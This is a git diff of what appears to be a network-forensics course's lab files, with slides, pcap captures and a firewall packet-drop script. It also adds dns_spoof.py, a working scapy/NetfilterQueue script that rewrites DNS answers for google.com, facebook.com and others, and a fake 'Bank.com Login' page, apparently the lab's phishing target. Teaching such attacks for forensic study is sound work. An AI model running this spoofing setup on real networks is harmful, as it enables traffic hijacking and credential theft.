diff --git a/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx b/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx
index 0242121..7846ee8 100644
Binary files a/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx and b/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx differ
diff --git a/Networking_Forensics/50_Firewall_Drop.pptx b/Networking_Forensics/50_Firewall_Drop.pptx
new file mode 100644
index 0000000..02ade32
Binary files /dev/null and b/Networking_Forensics/50_Firewall_Drop.pptx differ
diff --git a/Networking_Forensics/70_DNS.pptx b/Networking_Forensics/70_DNS.pptx
new file mode 100644
index 0000000..a1cc519
Binary files /dev/null and b/Networking_Forensics/70_DNS.pptx differ
diff --git a/Networking_Forensics/80_DNS_Spoof_Forensics.pptx b/Networking_Forensics/80_DNS_Spoof_Forensics.pptx
new file mode 100644
index 0000000..e18375d
Binary files /dev/null and b/Networking_Forensics/80_DNS_Spoof_Forensics.pptx differ
diff --git a/Networking_Forensics/lab_files/dns/dig_dns.pcap b/Networking_Forensics/lab_files/dns/dig_dns.pcap
new file mode 100644
index 0000000..6609665
Binary files /dev/null and b/Networking_Forensics/lab_files/dns/dig_dns.pcap differ
diff --git a/Networking_Forensics/lab_files/dns/http_dns.pcap b/Networking_Forensics/lab_files/dns/http_dns.pcap
new file mode 100644
index 0000000..690abc5
Binary files /dev/null and b/Networking_Forensics/lab_files/dns/http_dns.pcap differ
diff --git a/Networking_Forensics/lab_files/dns/http_ub_dns.pcap b/Networking_Forensics/lab_files/dns/http_ub_dns.pcap
new file mode 100644
index 0000000..3517ce7
Binary files /dev/null and b/Networking_Forensics/lab_files/dns/http_ub_dns.pcap differ
diff --git a/Networking_Forensics/code/arp.py b/Networking_Forensics/lab_files/dns_spoof/arp.py
similarity index 100%
rename from Networking_Forensics/code/arp.py
rename to Networking_Forensics/lab_files/dns_spoof/arp.py
diff --git a/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py b/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
new file mode 100644
index 0000000..f348b85
--- /dev/null
+++ b/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
@@ -0,0 +1,64 @@
+# https://www.geeksforgeeks.org/how-to-make-a-dns-spoof-attack-using-scapy-in-python/
+# https://www.thepythoncode.com/article/make-dns-spoof-python
+import os
+import logging as log
+from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
+from netfilterqueue import NetfilterQueue
+
+
+class DnsSnoof:
+	def __init__(self, hostDict, queueNum):
+		self.hostDict = hostDict
+		self.queueNum = queueNum
+		self.queue = NetfilterQueue()
+
+	def __call__(self):
+		log.info("Snoofing....")
+		os.system(
+			f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+		self.queue.bind(self.queueNum, self.callBack)
+		try:
+			self.queue.run()
+		except KeyboardInterrupt:
+			os.system(
+				f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+			log.info("[!] iptable rule flushed")
+
+	def callBack(self, packet):
+		scapyPacket = IP(packet.get_payload())
+		if scapyPacket.haslayer(DNSRR):
+			try:
+				log.info(f'[original] { scapyPacket[DNSRR].summary()}')
+				queryName = scapyPacket[DNSQR].qname
+				if queryName in self.hostDict:
+					scapyPacket[DNS].an = DNSRR(
+						rrname=queryName, rdata=self.hostDict[queryName])
+					scapyPacket[DNS].ancount = 1
+					del scapyPacket[IP].len
+					del scapyPacket[IP].chksum
+					del scapyPacket[UDP].len
+					del scapyPacket[UDP].chksum
+					log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
+				else:
+					log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
+			except IndexError as error:
+				log.error(error)
+			packet.set_payload(bytes(scapyPacket))
+		return packet.accept()
+
+
+if __name__ == '__main__':
+	try:
+		hostDict = {
+			b"google.com.": "136.160.215.15",
+			b"facebook.com.": "136.160.215.15",
+   			b"ubalt.com.": "136.160.215.15",
+      		b"g00gle.com.": "136.160.215.15",
+		}
+		queueNum = 1
+		log.basicConfig(format='%(asctime)s - %(message)s',
+						level = log.INFO)
+		snoof = DnsSnoof(hostDict, queueNum)
+		snoof()
+	except OSError as error:
+		log.error(error)
diff --git a/Networking_Forensics/lab_files/dns_spoof/index.html b/Networking_Forensics/lab_files/dns_spoof/index.html
new file mode 100644
index 0000000..1a03edd
--- /dev/null
+++ b/Networking_Forensics/lab_files/dns_spoof/index.html
@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Bank.com Login</title>
+</head>
+
+<body>
+    <h1>Bank.com Login</h1>
+    <form action="#" method="post">
+        <label for="username">Username:</label>
+        <input type="text" id="username" name="username" required><br><br>
+
+        <label for="password">Password:</label>
+        <input type="password" id="password" name="password" required><br><br>
+
+        <input type="submit" value="Login">
+    </form>
+</body>
+
+</html>
\ No newline at end of file
diff --git a/Networking_Forensics/lab_files/firewall/hello.html b/Networking_Forensics/lab_files/firewall/hello.html
new file mode 100644
index 0000000..6f082c1
--- /dev/null
+++ b/Networking_Forensics/lab_files/firewall/hello.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Hello World</title>
+</head>
+
+<body>
+    <h1>Hello World! Network Forensics. </h1>
+    <p>Welcome to my simple web page.</p>
+</body>
+
+</html>
\ No newline at end of file
diff --git a/Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py b/Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py
new file mode 100644
index 0000000..00638d4
--- /dev/null
+++ b/Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+
+import argparse
+import os
+import signal
+import sys
+
+from netfilterqueue import NetfilterQueue
+from scapy.layers.inet import IP
+from scapy.sendrecv import send
+
+
+def iptables_add_rule(ip_address):
+    os.system(f"iptables -A INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
+
+
+def iptables_remove_rule(ip_address):
+    os.system(f"iptables -D INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
+
+
+def handle_packet(packet):
+    ip = IP(packet.get_payload())
+    source_ip = ip.src
+    print(f"Receiving packet from {source_ip}")
+
+    if source_ip == args.source_ip:
+        print(f"Dropping packet from {source_ip}")
+        packet.drop()
+        print("================================")
+
+def parse_arguments():
+    parser = argparse.ArgumentParser(description="Python script to demonstrate iptables functions")
+    parser.add_argument("source_ip", help="Source IP address to filter")
+    return parser.parse_args()
+
+
+def main():
+    if os.geteuid() != 0:
+        print("You must be root to run this script.")
+        sys.exit(1)
+
+    global args
+    args = parse_arguments()
+
+    iptables_add_rule(args.source_ip)
+
+    q = NetfilterQueue()
+    q.bind(1, handle_packet)
+
+    try:
+        print("Waiting incoming packets...")
+        q.run()
+    except KeyboardInterrupt:
+        print("Exiting...")
+        q.unbind()
+        iptables_remove_rule(args.source_ip)
+        print("Rules are removed...")
+
+
+if __name__ == "__main__":
+    main()
diff --git a/Networking_Forensics/lab_files/firewall_forward/hello.html b/Networking_Forensics/lab_files/firewall_forward/hello.html
new file mode 100644
index 0000000..6f082c1
--- /dev/null
+++ b/Networking_Forensics/lab_files/firewall_forward/hello.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Hello World</title>
+</head>
+
+<body>
+    <h1>Hello World! Network Forensics. </h1>
+    <p>Welcome to my simple web page.</p>
+</body>
+
+</html>
\ No newline at end of file